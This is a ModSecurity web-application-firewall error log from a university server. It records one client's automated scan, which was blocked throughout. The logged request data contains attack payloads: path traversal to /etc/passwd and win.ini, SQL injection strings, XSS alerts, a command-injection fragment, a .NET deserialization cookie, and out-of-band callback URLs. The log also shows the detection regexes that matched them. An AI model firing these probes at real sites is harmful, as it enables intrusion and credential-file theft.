[Tue Aug 29 11:42:32.397688 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gwnxaawwr7qmgg.oast.site found within TX:1: cjmnbitjmimt14dgn26gwnxaawwr7qmgg.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAd5nrUAAAAm"]
[Tue Aug 29 11:42:32.411984 2023] [:error] [pid 1924] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "repositoryfeb.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAeEDvIAAAAy"]
[Tue Aug 29 11:42:34.394064 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAdSZMUAAAAX"]
[Tue Aug 29 11:42:34.418527 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAeB1oMAAAAv"]
[Tue Aug 29 11:42:40.529504 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAeYbxAAAAAB"]
[Tue Aug 29 11:42:41.421488 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QcCo-f0AAAdeQ20AAAAQ"]
[Tue Aug 29 11:42:41.483675 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAdb7lYAAAAb"]
[Tue Aug 29 11:42:42.367841 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAd5nswAAAAm"]
[Tue Aug 29 11:42:43.376410 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAdQ3hsAAAAV"]
[Tue Aug 29 11:42:46.364918 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAARpg2EAAAAU"]
[Tue Aug 29 11:42:46.593302 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAdV7doAAAAa"]
[Tue Aug 29 11:42:47.395070 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAeB1owAAAAv"]
[Tue Aug 29 11:42:48.405169 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAdlvc8AAAAl"]
[Tue Aug 29 11:42:48.412443 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAcvBncAAAAJ"]
[Tue Aug 29 11:42:48.445452 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAcvBngAAAAJ"]
[Tue Aug 29 11:42:48.509968 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26g4bxu1y7dbucop.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAXNuXIAAAAg"]
[Tue Aug 29 11:42:50.388266 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAbo-eoAAAAi"]
[Tue Aug 29 11:42:51.377366 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAc@caEAAAAL"]
[Tue Aug 29 11:42:51.384616 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAdUc3UAAAAZ"]
[Tue Aug 29 11:42:52.369480 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAdxUSwAAAAC"]
[Tue Aug 29 11:42:53.372467 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAd2320AAAAI"]
[Tue Aug 29 11:42:53.380989 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAcoNlIAAAAF"]
[Tue Aug 29 11:42:54.405514 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAd2328AAAAI"]
[Tue Aug 29 11:42:54.532803 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAdSZOUAAAAX"]
[Tue Aug 29 11:42:57.443782 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAeZ55oAAAAN"]
[Tue Aug 29 11:42:59.707523 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAc3608AAAAO"]
[Tue Aug 29 11:43:00.400901 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAeChZMAAAAw"]
[Tue Aug 29 11:43:00.427593 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAeoBAIAAAAT"]
[Tue Aug 29 11:43:00.428400 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAd9UOMAAAAr"]
[Tue Aug 29 11:43:03.434125 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAeX1DkAAAAK"]
[Tue Aug 29 11:43:03.448207 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAd9UOkAAAAr"]
[Tue Aug 29 11:43:04.374191 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAdECdIAAAAW"]
[Tue Aug 29 11:43:04.433583 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAeX1D0AAAAK"]
